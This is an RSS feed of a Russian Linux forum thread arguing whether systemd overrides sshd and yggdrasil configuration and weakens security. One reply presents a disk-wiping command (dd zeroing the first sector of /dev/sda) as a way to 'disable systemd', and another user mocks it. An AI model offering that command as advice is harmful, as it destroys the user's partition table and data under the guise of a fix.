<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: systemd плюет на вашу безопасность.</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html</link>
    <description>аааааа!!! какже пригорает! я уже прожег стул и вскипятил ванну остужая свой пукан.&lt;br&gt;&lt;br&gt;короче к сути: системд срал на то что ты пишешь в конфигфайле программы, у него свой конфиг и он имеет приоритет над конфигом любой программы!!!!&lt;br&gt;надо мне ссш и пару других сервисов изолировать от интернета но сохранить функционал, я поставил yggdrasil повесил сервисы на её ipv6 адрес подключил к своей частной сети, и что? и ничего!!!&lt;br&gt;в /etc/ssh/sshd_config прямо написано слушать только inet6 и ipv6 адрес игдрасиль, перегружаем а оно продолжает слушать ipv4 и хоть ты тресни будет его слушать даже если ты его убрал с конфига!&lt;br&gt;накопал как это убрать в системд, отключил создание сокета до запуска ссш, запретил его вообще нахрен. заработало как надо.&lt;br&gt;но, ноооо.... но при перезапуске игдрасиль меняет ipv6 адрес! рукалицо и много мата. а ведь приватный ключ создан и путь к нему указан, он не должен меняться - а он и не меняется(многомата) он вообще не читается а генерируется не лету по тому что тадаааааммм!!! СИСТЕМД! эта твар</description>

<item>
    <title>systemd плюет на вашу безопасность. (Аноним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#17</link>
    <pubDate>Tue, 27 Jan 2026 14:45:25 GMT</pubDate>
    <description>&amp;gt; Да, все правильно, это systemd.&lt;br&gt;&amp;gt; Чтобы его отключить выполни команду: &lt;br&gt;&amp;gt; sudo dd if=/dev/zero of=/dev/sda bs=512 count=1 &lt;br&gt;&amp;gt; И напиши что выведет команда на екран &lt;br&gt;&lt;br&gt;Привет, клоун. У меня нет устройства /dev/sda, мне нужно заменить на /dev/nvme0n1?&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (Аноним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#16</link>
    <pubDate>Mon, 26 Jan 2026 22:40:49 GMT</pubDate>
    <description>Да, все правильно, это systemd.&lt;br&gt;&lt;br&gt;Чтобы его отключить выполни команду:&lt;br&gt;sudo dd if=/dev/zero of=/dev/sda bs=512 count=1&lt;br&gt;&lt;br&gt;&lt;br&gt;И напиши что выведет команда на екран&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (Антним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#15</link>
    <pubDate>Wed, 14 Jan 2026 16:11:59 GMT</pubDate>
    <description>&amp;gt;&amp;gt; systemd плюет на вашу безопасность &lt;br&gt;&amp;gt; Проблема не в systemd, а в неосиляторах, которые не понимают как она работает, не хотят разобраться и не в состоянии разобраться. Вот раньше линуксом пользовались компетентные люди, которые могли.&lt;br&gt;&lt;br&gt;Проблемы в безопасности таки в systemd, просто в других местах...&lt;br&gt;&lt;br&gt;Проверь например опции монтирования дисков:&lt;br&gt;&lt;br&gt;    mount -a &amp;#124;grep -Ev (noexec&amp;#124;ro,)&lt;br&gt;    mount -a &amp;#124;grep -Ev (nosuid&amp;#124;ro,)&lt;br&gt;    mount -a &amp;#124;grep -v &apos;/dev&apos; &amp;#124;grep -Ev (nodev&amp;#124;ro,)&lt;br&gt;&lt;br&gt;И что твой systemd намонтировал?&lt;br&gt;&lt;br&gt;А теперь попробуй разобраться и указать правильные опции монтирования для этого systemd...&lt;br&gt;&lt;br&gt;Жду конфиг для systemd з правильными опциями монтирования!&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (Аноним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#14</link>
    <pubDate>Mon, 12 Jan 2026 12:23:37 GMT</pubDate>
    <description>&amp;gt; СИСТЕМД! эта тварь имеет свой конфиг и то что ты пишешь &lt;br&gt;&amp;gt; в конфиге программы вообще можешь не писать и удалить к чертям. &lt;br&gt;&lt;br&gt;И ты этого не знал О_о?!&lt;br&gt;&lt;br&gt;&amp;gt; пошел копать где у меня конфиг игдрасиль в системде&lt;br&gt;&lt;br&gt;С этого и надо было начать.&lt;br&gt;&lt;br&gt;&amp;gt; systemd плюет на вашу безопасность&lt;br&gt;&lt;br&gt;Проблема не в systemd, а в неосиляторах, которые не понимают как она работает, не хотят разобраться и не в состоянии разобраться. Вот раньше линуксом пользовались компетентные люди, которые могли.&lt;br&gt;&lt;br&gt;А сейчас понабежало хомов, которые умеют только &quot;набить е6ало&quot;, да и то только на словах.&lt;br&gt;Хз что ты там собираешься приватно делать через yggdrasil, но глядя как умело ты все настраиваешь... как бы ты не подарил пару звездочек на погоны кому-то.&lt;br&gt;&lt;br&gt;Переходи лучше на вин11, тебе там самое место.&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (Аноним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#13</link>
    <pubDate>Wed, 07 Jan 2026 05:37:34 GMT</pubDate>
    <description>&amp;gt; Проблема в безопасности systemd это одновременное выделение областей в режиме W и X!&lt;br&gt;&lt;br&gt;А также разрешение пользовательским процессам, проходя через JS фильтры передавать данные и команды привилегированным процессам.&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (Аноним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#12</link>
    <pubDate>Sat, 03 Jan 2026 07:24:25 GMT</pubDate>
    <description>&amp;gt; а безопасность тут при чем? при том что написав в конфиге слушать только 1 интерфейс ты будешь думать что слушается только он, а оно по умолчанию будет слушать все.&lt;br&gt;&lt;br&gt;У всех инит системах так. Это связано с самими сервисами в которых разрабами предусмотрено приоритет опций командной строки над опциями в конфигурационном файле. Уберите опции с командной строки (указанные в настройках systemd) и будут использоваться те, что прописаны в конфиге.&lt;br&gt;&lt;br&gt;Система инициализации должна создавать все необходимые каталоги для логов, пидов, сокетов. Так привилегий серверному процессу необходимо меньше, а значит безопасность будет выше. По этой же причине создание сокета (для портов &amp;lt;1024) системой инициализации повисит безопасность сервиса.&lt;br&gt;&lt;br&gt;Проблема в безопасности systemd это одновременное выделение областей в режиме W и X!&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (Аноним)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#11</link>
    <pubDate>Sat, 03 Jan 2026 07:22:57 GMT</pubDate>
    <description>&amp;gt; а безопасность тут при чем? при том что написав в конфиге слушать только 1 интерфейс ты будешь думать что слушается только он, а оно по умолчанию будет слушать все.&lt;br&gt;&lt;br&gt;У всех инит системах так. Это связано с самими сервисами в которых разрабами предусмотрено приоритет опций командной строки над опциями в конфигурационном файле. Уберите опции с командной строки и будут использоваться те, что прописаны в конфиге.&lt;br&gt;&lt;br&gt;Система инициализации должна создавать все необходимые каталоги для логов, пидов, сокетов. Так привилегий серверному процессу необходимо меньше, а значит безопасность будет выше. По этой же причине создание сокета (для портов &amp;lt;1024) системой инициализации повисит безопасность сервиса.&lt;br&gt;&lt;br&gt;Проблема в безопасности systemd это одновременное выделение областей в режиме W и X!&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (shadow_alone)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#10</link>
    <pubDate>Mon, 29 Dec 2025 13:53:52 GMT</pubDate>
    <description>О, кто-то не разобрался в сокетах. Какой милый подрыв.&lt;br&gt;Учи матчасть...&lt;br&gt;</description>
</item>

<item>
    <title>systemd плюет на вашу безопасность. (Tron is Whistling)</title>
    <link>https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#9</link>
    <pubDate>Mon, 29 Dec 2025 11:51:32 GMT</pubDate>
    <description>И да - хотите демоном вешайте, хотите по сокету дёргайте, тут уже всё на совести дистростроителей. systemd умеет как то, так и это. Кстати говоря &quot;переизобретённый&quot; inetd - очень неплох.&lt;br&gt;</description>
</item>

</channel>
</rss>
